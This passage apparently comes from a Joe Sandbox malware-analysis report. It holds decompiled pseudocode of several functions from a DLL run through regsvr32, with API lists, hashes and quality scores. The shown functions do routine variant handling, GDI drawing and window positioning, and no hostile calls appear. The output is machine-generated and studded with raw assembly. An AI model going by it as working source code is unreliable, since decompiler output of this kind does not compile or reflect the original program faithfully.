                                                                                                                						_t140 = E1002C7EC(0,  *((intOrPtr*)(_t195 - 0x34)), _t187, _t193, __eflags);
                                                                                                                						__eflags = _t140;
                                                                                                                						 *(_t195 - 0x18) = _t140;
                                                                                                                						if(_t140 != 0) {
                                                                                                                							L26:
                                                                                                                							_t191 =  *(_t195 + 0x14);
                                                                                                                							_t187 = 0;
                                                                                                                							__eflags =  *(_t191 + 8);
                                                                                                                							if( *(_t191 + 8) <= 0) {
                                                                                                                								L29:
                                                                                                                								__eflags =  *(_t195 - 0x18);
                                                                                                                								_t179 = _t195 - 0x58;
                                                                                                                								if( *(_t195 - 0x18) == 0) {
                                                                                                                									E1002C74F(_t179);
                                                                                                                									_t142 =  *(_t195 + 0x10);
                                                                                                                									__eflags = _t142;
                                                                                                                									if(_t142 == 0) {
                                                                                                                										_t144 = ( *(_t195 - 0x24) & 0x0000ffff) - 8;
                                                                                                                										__eflags = _t144;
                                                                                                                										if(_t144 == 0) {
                                                                                                                											__imp__#6(_t173);
                                                                                                                											L52:
                                                                                                                											 *(_t195 - 4) = 0;
                                                                                                                											E1001663E(_t195 - 0x58);
                                                                                                                											 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
                                                                                                                											__eflags =  *(_t195 - 0x2c);
                                                                                                                											if( *(_t195 - 0x2c) != 0) {
                                                                                                                												_push( *((intOrPtr*)(_t195 - 0x30)));
                                                                                                                												_push(0);
                                                                                                                												E10022A6E();
                                                                                                                											}
                                                                                                                											__eflags = 0;
                                                                                                                											goto L55;
                                                                                                                										}
                                                                                                                										_t148 = _t144 - 1;
                                                                                                                										__eflags = _t148;
                                                                                                                										if(_t148 == 0) {
                                                                                                                											L48:
                                                                                                                											__eflags = _t173;
                                                                                                                											if(_t173 != 0) {
                                                                                                                												 *((intOrPtr*)( *_t173 + 8))(_t173);
                                                                                                                											}
                                                                                                                											goto L52;
                                                                                                                										}
                                                                                                                										_t151 = _t148 - 3;
                                                                                                                										__eflags = _t151;
                                                                                                                										if(_t151 == 0) {
                                                                                                                											__imp__#9(_t195 - 0x44);
                                                                                                                											goto L52;
                                                                                                                										}
                                                                                                                										__eflags = _t151 != 1;
                                                                                                                										if(_t151 != 1) {
                                                                                                                											goto L52;
                                                                                                                										}
                                                                                                                										goto L48;
                                                                                                                									}
                                                                                                                									_t181 =  *(_t195 - 0x24);
                                                                                                                									 *_t142 = _t181;
                                                                                                                									_t183 = (_t181 & 0x0000ffff) + 0xfffffffe;
                                                                                                                									__eflags = _t183 - 0x13;
                                                                                                                									if(_t183 > 0x13) {
                                                                                                                										goto L52;
                                                                                                                									}
                                                                                                                									switch( *((intOrPtr*)(_t183 * 4 +  &M1002CDE4))) {
                                                                                                                										case 0:
                                                                                                                											L41:
                                                                                                                											 *(__eax + 8) = __bx;
                                                                                                                											goto L52;
                                                                                                                										case 1:
                                                                                                                											 *(__eax + 8) = __ebx;
                                                                                                                											goto L52;
                                                                                                                										case 2:
                                                                                                                											 *(__eax + 8) =  *(__ebp - 0x44);
                                                                                                                											goto L52;
                                                                                                                										case 3:
                                                                                                                											 *(__eax + 8) =  *(__ebp - 0x44);
                                                                                                                											goto L52;
                                                                                                                										case 4:
                                                                                                                											__ecx =  *(__ebp - 0x44);
                                                                                                                											 *(__eax + 8) =  *(__ebp - 0x44);
                                                                                                                											__ecx =  *(__ebp - 0x40);
                                                                                                                											 *(__eax + 0xc) = __ecx;
                                                                                                                											goto L52;
                                                                                                                										case 5:
                                                                                                                											__bx =  ~__bx;
                                                                                                                											asm("sbb ebx, ebx");
                                                                                                                											goto L41;
                                                                                                                										case 6:
                                                                                                                											__esi = __ebp - 0x44;
                                                                                                                											__edi = __eax;
                                                                                                                											asm("movsd");
                                                                                                                											asm("movsd");
                                                                                                                											asm("movsd");
                                                                                                                											asm("movsd");
                                                                                                                											goto L52;
                                                                                                                										case 7:
                                                                                                                											goto L52;
                                                                                                                										case 8:
                                                                                                                											_t142[4] = _t173;
                                                                                                                											goto L52;
                                                                                                                									}
                                                                                                                								}
                                                                                                                								 *(_t195 - 4) = 0;
                                                                                                                								E1001663E(_t179);
                                                                                                                								 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
                                                                                                                								__eflags =  *(_t195 - 0x2c);
                                                                                                                								if( *(_t195 - 0x2c) != 0) {
                                                                                                                									_push( *((intOrPtr*)(_t195 - 0x30)));
                                                                                                                									_push(0);
                                                                                                                									E10022A6E();
                                                                                                                								}
                                                                                                                								goto L55;
                                                                                                                							}
                                                                                                                							do {
                                                                                                                								__imp__#9( *(_t195 - 0x1c));
                                                                                                                								 *(_t195 - 0x1c) =  &(( *(_t195 - 0x1c))[0x10]);
                                                                                                                								_t187 = _t187 + 1;
                                                                                                                								__eflags = _t187 -  *(_t191 + 8);
                                                                                                                							} while (_t187 <  *(_t191 + 8));
                                                                                                                							goto L29;
                                                                                                                						}
                                                                                                                						_t158 =  *(_t195 - 0x24) & 0x0000ffff;
                                                                                                                						__eflags = _t158 - 4;
                                                                                                                						_push(_t187);
                                                                                                                						_push(_t193);
                                                                                                                						_push( *(_t195 - 0x28));
                                                                                                                						 *(_t195 - 4) = 2;
                                                                                                                						if(_t158 == 4) {
                                                                                                                							E1003854D();
                                                                                                                							 *((intOrPtr*)(_t195 - 0x34)) = _t204;
                                                                                                                							 *((intOrPtr*)(_t195 - 0x44)) =  *((intOrPtr*)(_t195 - 0x34));
                                                                                                                							L25:
                                                                                                                							 *(_t195 - 4) = 1;
                                                                                                                							goto L26;
                                                                                                                						}
                                                                                                                						__eflags = _t158 - 5;
                                                                                                                						if(_t158 == 5) {
                                                                                                                							L23:
                                                                                                                							E1003854D();
                                                                                                                							 *((long long*)(_t195 - 0x44)) = _t204;
                                                                                                                							goto L25;
                                                                                                                						}
                                                                                                                						__eflags = _t158 - 7;
                                                                                                                						if(_t158 == 7) {
                                                                                                                							goto L23;
                                                                                                                						}
                                                                                                                						__eflags = _t158 + 0xffffffec - 1;
                                                                                                                						if(_t158 + 0xffffffec > 1) {
                                                                                                                							_t173 = E1003854D();
                                                                                                                						} else {
                                                                                                                							 *((intOrPtr*)(_t195 - 0x44)) = E1003854D();
                                                                                                                							 *((intOrPtr*)(_t195 - 0x40)) = _t185;
                                                                                                                						}
                                                                                                                						goto L25;
                                                                                                                					}
                                                                                                                					L12:
                                                                                                                					 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
                                                                                                                					__eflags =  *(_t195 - 0x2c) - _t187;
                                                                                                                					if( *(_t195 - 0x2c) == _t187) {
                                                                                                                						goto L7;
                                                                                                                					}
                                                                                                                					_push( *((intOrPtr*)(_t195 - 0x30)));
                                                                                                                					_push(_t187);
                                                                                                                					goto L6;
                                                                                                                				}
                                                                                                                				_t19 = _t190 + 3; // 0x3
                                                                                                                				_t187 = _t19;
                                                                                                                				if(E100151B0(_t185, _t201, _t19) != 0) {
                                                                                                                					E1003CBD0(_t187);
                                                                                                                					 *(_t195 - 0x10) = _t196;
                                                                                                                					_t188 = _t196;
                                                                                                                					_t26 = _t190 + 3; // 0x3
                                                                                                                					E100161B4(_t188, _t190, _t195, _t188, _t26,  *(_t195 - 0x18), _t190);
                                                                                                                					_t169 = _t173[0xc] & 0x0000ffff;
                                                                                                                					_t196 =  &(_t196[0x10]);
                                                                                                                					__eflags = _t169 - 8;
                                                                                                                					 *(_t195 - 0x18) = _t188;
                                                                                                                					if(_t169 == 8) {
                                                                                                                						_t169 = 0xe;
                                                                                                                					}
                                                                                                                					 *(_t195 - 0x24) =  *(_t195 - 0x24) & 0x00000000;
                                                                                                                					_t188[_t190] = 0xff;
                                                                                                                					_t194 = _t190 + 1;
                                                                                                                					_t188[_t194] = _t169;
                                                                                                                					_t188[_t194 + 1] = 0;
                                                                                                                					 *(_t195 - 0x28) = _t173[0x14];
                                                                                                                					_t187 = 0;
                                                                                                                					__eflags = 0;
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                				goto L4;
                                                                                                                			}





























                                                                                                                0x1002cd9d
                                                                                                                0x1002cd9d
                                                                                                                0x00000000
                                                                                                                0x1002cd98
                                                                                                                0x1002cd8e
                                                                                                                0x1002cd8e
                                                                                                                0x1002cd91
                                                                                                                0x1002cda6
                                                                                                                0x00000000
                                                                                                                0x1002cda6
                                                                                                                0x1002cd93
                                                                                                                0x1002cd94
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002cd94
                                                                                                                0x1002cd2c
                                                                                                                0x1002cd2f
                                                                                                                0x1002cd35
                                                                                                                0x1002cd38
                                                                                                                0x1002cd3b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002cd3d
                                                                                                                0x00000000
                                                                                                                0x1002cd6c
                                                                                                                0x1002cd6c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002cd7d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002cd5a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002cd62
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002cd49
                                                                                                                0x1002cd4c
                                                                                                                0x1002cd4f
                                                                                                                0x1002cd52
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002cd67
                                                                                                                0x1002cd6a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002cd72
                                                                                                                0x1002cd75
                                                                                                                0x1002cd77
                                                                                                                0x1002cd78
                                                                                                                0x1002cd79
                                                                                                                0x1002cd7a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002cd44
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002cd3d
                                                                                                                0x1002ccd5
                                                                                                                0x1002ccd9
                                                                                                                0x1002ccde
                                                                                                                0x1002cce2
                                                                                                                0x1002cce6
                                                                                                                0x1002cce8
                                                                                                                0x1002cceb
                                                                                                                0x1002cced
                                                                                                                0x1002cced
                                                                                                                0x00000000
                                                                                                                0x1002ccf2
                                                                                                                0x1002ccb9
                                                                                                                0x1002ccbc
                                                                                                                0x1002ccc2
                                                                                                                0x1002ccc6
                                                                                                                0x1002ccc7
                                                                                                                0x1002ccc7
                                                                                                                0x00000000
                                                                                                                0x1002ccb9
                                                                                                                0x1002cc50
                                                                                                                0x1002cc54
                                                                                                                0x1002cc57
                                                                                                                0x1002cc58
                                                                                                                0x1002cc59
                                                                                                                0x1002cc5c
                                                                                                                0x1002cc60
                                                                                                                0x1002cc94
                                                                                                                0x1002cc99
                                                                                                                0x1002cc9f
                                                                                                                0x1002cca2
                                                                                                                0x1002cca2
                                                                                                                0x00000000
                                                                                                                0x1002cca2
                                                                                                                0x1002cc62
                                                                                                                0x1002cc65
                                                                                                                0x1002cc8a
                                                                                                                0x1002cc8a
                                                                                                                0x1002cc8f
                                                                                                                0x00000000
                                                                                                                0x1002cc8f
                                                                                                                0x1002cc67
                                                                                                                0x1002cc6a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002cc6f
                                                                                                                0x1002cc72
                                                                                                                0x1002cc86
                                                                                                                0x1002cc74
                                                                                                                0x1002cc79
                                                                                                                0x1002cc7c
                                                                                                                0x1002cc7c
                                                                                                                0x00000000
                                                                                                                0x1002cc72
                                                                                                                0x1002cbae
                                                                                                                0x1002cbae
                                                                                                                0x1002cbb2
                                                                                                                0x1002cbb5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002cbb7
                                                                                                                0x1002cbba
                                                                                                                0x00000000
                                                                                                                0x1002cbba
                                                                                                                0x1002cb28
                                                                                                                0x1002cb28
                                                                                                                0x1002cb34
                                                                                                                0x1002cb56
                                                                                                                0x1002cb5b
                                                                                                                0x1002cb5e
                                                                                                                0x1002cb64
                                                                                                                0x1002cb69
                                                                                                                0x1002cb6e
                                                                                                                0x1002cb72
                                                                                                                0x1002cb75
                                                                                                                0x1002cb79
                                                                                                                0x1002cb7c
                                                                                                                0x1002cb80
                                                                                                                0x1002cb80
                                                                                                                0x1002cb81
                                                                                                                0x1002cb85
                                                                                                                0x1002cb89
                                                                                                                0x1002cb8a
                                                                                                                0x1002cb8d
                                                                                                                0x1002cb95
                                                                                                                0x1002cb98
                                                                                                                0x1002cb98
                                                                                                                0x00000000
                                                                                                                0x1002cb98
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 1002CADB
                                                                                                                • lstrlenA.KERNEL32(00000000,000000FF,00000050,1003709B,00000000,00000001,?,?,000000FF,?,?,?), ref: 1002CB0D
                                                                                                                  • Part of subcall function 100161B4: _memcpy_s.LIBCMT ref: 100161C4
                                                                                                                • _memset.LIBCMT ref: 1002CBDD
                                                                                                                • VariantClear.OLEAUT32(?), ref: 1002CCBC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 4021759052-0
                                                                                                                • Opcode ID: 3b913bb3591ddde8af3c2de49f38e964adc0fa6ddb32f8b22ae52ae76205c4ad
                                                                                                                • Instruction ID: 6bb8f09ddf9af857769089a4c7cb701503405987a78ccbac62f9c74c842dc682
                                                                                                                • Opcode Fuzzy Hash: 3b913bb3591ddde8af3c2de49f38e964adc0fa6ddb32f8b22ae52ae76205c4ad
                                                                                                                • Instruction Fuzzy Hash: 7DA16A3180024DDBCF11CFE4E885AEEBBB0FF05354FA1415AE915AB291D735AE41DBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 54%
                                                                                                                			E1000B7A0(signed int __edx, signed long long __fp0, signed int _a4, signed int _a8, signed char _a12, unsigned int _a16, signed int* _a20) {
                                                                                                                				struct tagRECT _v28;
                                                                                                                				long _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed long long _v40;
                                                                                                                				signed long long _v44;
                                                                                                                				unsigned int _t60;
                                                                                                                				signed char _t62;
                                                                                                                				int _t65;
                                                                                                                				void* _t77;
                                                                                                                				int _t80;
                                                                                                                				struct HDC__* _t83;
                                                                                                                				unsigned int _t84;
                                                                                                                				long _t88;
                                                                                                                				signed int _t89;
                                                                                                                				int _t91;
                                                                                                                				signed int _t98;
                                                                                                                				signed int _t100;
                                                                                                                				int* _t107;
                                                                                                                				signed int _t110;
                                                                                                                				int _t111;
                                                                                                                				void* _t112;
                                                                                                                				int _t114;
                                                                                                                				signed long long _t124;
                                                                                                                				signed long long _t125;
                                                                                                                				signed long long _t126;
                                                                                                                
                                                                                                                				_t107 = _a8;
                                                                                                                				_t84 = _a16;
                                                                                                                				asm("cdq");
                                                                                                                				_a8 = (_t107[1] - _t107[3] ^ __edx) - __edx;
                                                                                                                				asm("fild dword [esp+0x40]");
                                                                                                                				asm("fidiv dword [eax]");
                                                                                                                				_t60 = _a12;
                                                                                                                				_t98 = _t60 & 0x000000ff;
                                                                                                                				_a8 = (_t84 & 0x000000ff) - _t98;
                                                                                                                				_t110 = _t60 & 0x000000ff;
                                                                                                                				_t62 = _t60 >> 0x00000010 & 0x000000ff;
                                                                                                                				_a16 = _t98;
                                                                                                                				_a12 = _t110;
                                                                                                                				_v44 = __fp0;
                                                                                                                				asm("fild dword [esp+0x40]");
                                                                                                                				_t124 = st0;
                                                                                                                				_a8 = (_t84 & 0x000000ff) - _t110;
                                                                                                                				asm("fdivp st2, st0");
                                                                                                                				asm("fxch st0, st1");
                                                                                                                				_v28.left = _t124;
                                                                                                                				asm("fild dword [esp+0x40]");
                                                                                                                				_a8 = (_t84 >> 0x00000010 & 0x000000ff) - _t62;
                                                                                                                				_t88 = 0;
                                                                                                                				_t125 = _t124 / st1;
                                                                                                                				_v36 = _t125;
                                                                                                                				asm("fild dword [esp+0x40]");
                                                                                                                				_a8 = _t62;
                                                                                                                				_t126 = _t125 / st1;
                                                                                                                				_v44 = _t126;
                                                                                                                				asm("fst qword [esp+0x20]");
                                                                                                                				asm("fcomp qword [0x100582f0]");
                                                                                                                				asm("fnstsw ax");
                                                                                                                				if((_t62 & 0x00000001) == 0) {
                                                                                                                					asm("fild dword [esp+0x40]");
                                                                                                                					_t83 = _a4;
                                                                                                                					_v40 = _t126;
                                                                                                                					asm("fild dword [esp+0x48]");
                                                                                                                					_v32 = _t126;
                                                                                                                					asm("fldz");
                                                                                                                					_a8 = _t126;
                                                                                                                					asm("fild dword [esp+0x4c]");
                                                                                                                					_a16 = _t126;
                                                                                                                					do {
                                                                                                                						_t100 =  *_a20;
                                                                                                                						_t111 = _t107[1];
                                                                                                                						_t114 = _t100 * _t88 + _t111;
                                                                                                                						_t65 = _t107[3];
                                                                                                                						if(_t114 >= _t65) {
                                                                                                                							_t114 = _t65;
                                                                                                                						}
                                                                                                                						_t89 = _t88 + 1;
                                                                                                                						_a4 = _t89;
                                                                                                                						_t91 = _t89 * _t100 + _t111;
                                                                                                                						if(_t91 < _t65) {
                                                                                                                							_t65 = _t91;
                                                                                                                						}
                                                                                                                						SetRect( &(_v28.bottom),  *_t107, _t114, _t107[2] + 1, _t65);
                                                                                                                						asm("fnstcw word [esp+0x44]");
                                                                                                                						_a12 = _a8 & 0x0000ffff | 0x00000c00;
                                                                                                                						asm("fldcw word [esp+0x48]");
                                                                                                                						asm("fistp dword [esp+0x48]");
                                                                                                                						asm("fldcw word [esp+0x44]");
                                                                                                                						asm("fnstcw word [esp+0x44]");
                                                                                                                						_a12 = _a8 & 0x0000ffff | 0x00000c00;
                                                                                                                						asm("fldcw word [esp+0x48]");
                                                                                                                						asm("fistp dword [esp+0x48]");
                                                                                                                						asm("fldcw word [esp+0x44]");
                                                                                                                						asm("fnstcw word [esp+0x44]");
                                                                                                                						_a12 = _a8 & 0x0000ffff | 0x00000c00;
                                                                                                                						asm("fldcw word [esp+0x48]");
                                                                                                                						asm("fistp dword [esp+0x48]");
                                                                                                                						asm("fldcw word [esp+0x44]");
                                                                                                                						_t112 = CreateSolidBrush(0 << 0x00000008 | _a12 & 0xff);
                                                                                                                						_t77 = SelectObject(_t83, _t112);
                                                                                                                						FillRect(_t83,  &_v28, _t112);
                                                                                                                						SelectObject(_t83, _t77);
                                                                                                                						_t80 = DeleteObject(_t112);
                                                                                                                						_t88 = _v32;
                                                                                                                						_v28.left = _t88;
                                                                                                                						asm("fild dword [esp+0x44]");
                                                                                                                						_v28.left = (st0 * _v36 + _v32) * _v28.left + _a16;
                                                                                                                						asm("fcomp qword [esp+0x24]");
                                                                                                                						asm("fnstsw ax");
                                                                                                                					} while ((_t80 & 0x00000041) != 0);
                                                                                                                					return _t80;
                                                                                                                				}
                                                                                                                				return _t62;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • SetRect.USER32 ref: 1000B8A2
                                                                                                                • CreateSolidBrush.GDI32(?), ref: 1000B93F
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 1000B949
                                                                                                                • FillRect.USER32(?,?,00000000), ref: 1000B958
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 1000B960
                                                                                                                • DeleteObject.GDI32(00000000), ref: 1000B967
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$RectSelect$BrushCreateDeleteFillSolid
                                                                                                                • String ID:
                                                                                                                • API String ID: 1259150129-0
                                                                                                                • Opcode ID: 556a1328d1479f7a36dde81f0125fedcab08b7a7c7c2b8213f2bdc4e0a279404
                                                                                                                • Instruction ID: daab91d1012a66d55df06bc0a81dbb7ee2f0c3a6e9f80726e18018d3c30e1492
                                                                                                                • Opcode Fuzzy Hash: 556a1328d1479f7a36dde81f0125fedcab08b7a7c7c2b8213f2bdc4e0a279404
                                                                                                                • Instruction Fuzzy Hash: 7751F071608311DFD3049F1AC68846BBBF8FBCA791F01891DFAD192265E336D864CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 92%
                                                                                                                			E10039D19(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				char _v12;
                                                                                                                				struct tagRECT _v28;
                                                                                                                				struct tagRECT _v44;
                                                                                                                				struct tagRECT _v60;
                                                                                                                				void* _t81;
                                                                                                                				int _t83;
                                                                                                                				int _t90;
                                                                                                                				intOrPtr _t92;
                                                                                                                				intOrPtr _t111;
                                                                                                                				int _t125;
                                                                                                                				void* _t134;
                                                                                                                				void* _t139;
                                                                                                                				intOrPtr _t143;
                                                                                                                				void* _t145;
                                                                                                                				void* _t149;
                                                                                                                
                                                                                                                				_t145 = __edi;
                                                                                                                				_t134 = __ecx;
                                                                                                                				_t81 = _a4 -  *((intOrPtr*)(__ecx + 4));
                                                                                                                				_t139 = _a8 -  *((intOrPtr*)(__ecx + 8));
                                                                                                                				_t143 =  *((intOrPtr*)(__ecx + 0x8c));
                                                                                                                				_t149 = 2;
                                                                                                                				if(_t143 == 0xa) {
                                                                                                                					L7:
                                                                                                                					 *((intOrPtr*)(_t134 + 0x28)) =  *((intOrPtr*)(_t134 + 0x28)) + _t81;
                                                                                                                					L9:
                                                                                                                					_t83 =  *((intOrPtr*)(_t134 + 0x30)) -  *((intOrPtr*)(_t134 + 0x28));
                                                                                                                					__eflags = _t83;
                                                                                                                					L10:
                                                                                                                					if(_t83 < 0) {
                                                                                                                						_t83 = 0;
                                                                                                                					}
                                                                                                                					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x68)))) + 0x138))( &_v12, _t83, _t149, _t145);
                                                                                                                					_v44.left = GetSystemMetrics(0x4c);
                                                                                                                					_v44.top = GetSystemMetrics(0x4d);
                                                                                                                					_v44.right = GetSystemMetrics(0x4e) + _v44.left;
                                                                                                                					_t90 = GetSystemMetrics(0x4f);
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					_v44.bottom = _t90 + _v44.top;
                                                                                                                					_t92 =  *((intOrPtr*)(_t134 + 0x8c));
                                                                                                                					asm("movsd");
                                                                                                                					if(_t92 == 0xa || _t92 == 0xc) {
                                                                                                                						_v28.left =  *((intOrPtr*)(_t134 + 0x58)) -  *((intOrPtr*)(_t134 + 0x60)) - _v12 + _v28.right;
                                                                                                                						_v28.top =  *((intOrPtr*)(_t134 + 0x5c)) -  *((intOrPtr*)(_t134 + 0x64)) - _v8 + _v28.bottom;
                                                                                                                						__eflags = IntersectRect( &_v60,  &_v44,  &_v28);
                                                                                                                						if(__eflags != 0) {
                                                                                                                							 *((intOrPtr*)(_t134 + 0x38)) =  *((intOrPtr*)(_t134 + 0x40)) - _v12;
                                                                                                                							_t111 =  *((intOrPtr*)(_t134 + 0x44)) - _v8;
                                                                                                                							__eflags = _t111;
                                                                                                                							 *((intOrPtr*)(_t134 + 0x3c)) = _t111;
                                                                                                                							 *(_t134 + 0x48) = _v28.left;
                                                                                                                							 *((intOrPtr*)(_t134 + 0x4c)) = _v28.top;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_v28.right =  *((intOrPtr*)(_t134 + 0x60)) -  *((intOrPtr*)(_t134 + 0x58)) + _v28.left + _v12;
                                                                                                                						_v28.bottom =  *((intOrPtr*)(_t134 + 0x64)) -  *((intOrPtr*)(_t134 + 0x5c)) + _v28.top + _v8;
                                                                                                                						_t125 = IntersectRect( &_v60,  &_v44,  &_v28);
                                                                                                                						_t162 = _t125;
                                                                                                                						if(_t125 != 0) {
                                                                                                                							 *((intOrPtr*)(_t134 + 0x40)) =  *((intOrPtr*)(_t134 + 0x38)) + _v12;
                                                                                                                							 *((intOrPtr*)(_t134 + 0x44)) =  *((intOrPtr*)(_t134 + 0x3c)) + _v8;
                                                                                                                							 *((intOrPtr*)(_t134 + 0x50)) = _v28.right;
                                                                                                                							 *((intOrPtr*)(_t134 + 0x54)) = _v28.bottom;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					 *((intOrPtr*)(_t134 + 4)) = _a4;
                                                                                                                					 *((intOrPtr*)(_t134 + 8)) = _a8;
                                                                                                                					return E10039B0A(_t134, _t162, 0);
                                                                                                                				}
                                                                                                                				if(_t143 == 0xb) {
                                                                                                                					__eflags = _t143 - 0xa;
                                                                                                                					if(_t143 != 0xa) {
                                                                                                                						_t14 = __ecx + 0x30;
                                                                                                                						 *_t14 =  *((intOrPtr*)(__ecx + 0x30)) + _t81;
                                                                                                                						__eflags =  *_t14;
                                                                                                                						goto L9;
                                                                                                                					}
                                                                                                                					goto L7;
                                                                                                                				} else {
                                                                                                                					_t149 = 0x22;
                                                                                                                					if(_t143 != 0xc) {
                                                                                                                						_t8 = __ecx + 0x34;
                                                                                                                						 *_t8 =  *((intOrPtr*)(__ecx + 0x34)) + _t139;
                                                                                                                						__eflags =  *_t8;
                                                                                                                					} else {
                                                                                                                						 *((intOrPtr*)(__ecx + 0x2c)) =  *((intOrPtr*)(__ecx + 0x2c)) + _t139;
                                                                                                                					}
                                                                                                                					_t83 =  *((intOrPtr*)(_t134 + 0x34)) -  *((intOrPtr*)(_t134 + 0x2c));
                                                                                                                					goto L10;
                                                                                                                				}
                                                                                                                			}




















                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MetricsSystem$IntersectRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 1124862357-0
                                                                                                                • Opcode ID: 898a4ed08d5cfce531f3a23dd7598b99bfb1a0a6b791b3a14d4b035569a66b21
                                                                                                                • Instruction ID: 1907e4bbe30104e178743dfcac76d675819c36da8094fba4364036f7f07b8e73
                                                                                                                • Opcode Fuzzy Hash: 898a4ed08d5cfce531f3a23dd7598b99bfb1a0a6b791b3a14d4b035569a66b21
                                                                                                                • Instruction Fuzzy Hash: 88518372A00209DFCB45DFA8C9C5A9EBBF4FF08351F144596E905EB24AE730E980CB94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 42%
                                                                                                                			E1002CEBB(void* __edx, void* __eflags) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t42;
                                                                                                                				void* _t46;
                                                                                                                				void* _t47;
                                                                                                                				void* _t52;
                                                                                                                				intOrPtr _t66;
                                                                                                                				intOrPtr _t74;
                                                                                                                				void* _t76;
                                                                                                                				void* _t96;
                                                                                                                				void* _t97;
                                                                                                                				intOrPtr* _t98;
                                                                                                                				void* _t99;
                                                                                                                				short* _t101;
                                                                                                                				void* _t102;
                                                                                                                				signed int _t103;
                                                                                                                				void* _t105;
                                                                                                                
                                                                                                                				_t96 = __edx;
                                                                                                                				_t103 = _t105 - 0x8c;
                                                                                                                				_t42 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				 *(_t103 + 0x88) = _t42 ^ _t103;
                                                                                                                				_t74 =  *((intOrPtr*)(_t103 + 0x98));
                                                                                                                				_t101 =  *((intOrPtr*)(_t103 + 0x94));
                                                                                                                				_push(_t97);
                                                                                                                				E1003BB70(_t97, _t101, 0, 0x20);
                                                                                                                				 *((intOrPtr*)(_t103 - 0x80)) = _t103 - 0x78;
                                                                                                                				_t46 = E1001EFEF(_t74, 0x1005cd50);
                                                                                                                				_t98 = __imp__#2;
                                                                                                                				if(_t46 == 0) {
                                                                                                                					_t78 = _t74;
                                                                                                                					_t47 = E1001EFEF(_t74, 0x1005a0cc);
                                                                                                                					__eflags = _t47;
                                                                                                                					_push(0x100);
                                                                                                                					_push(_t103 - 0x78);
                                                                                                                					if(_t47 == 0) {
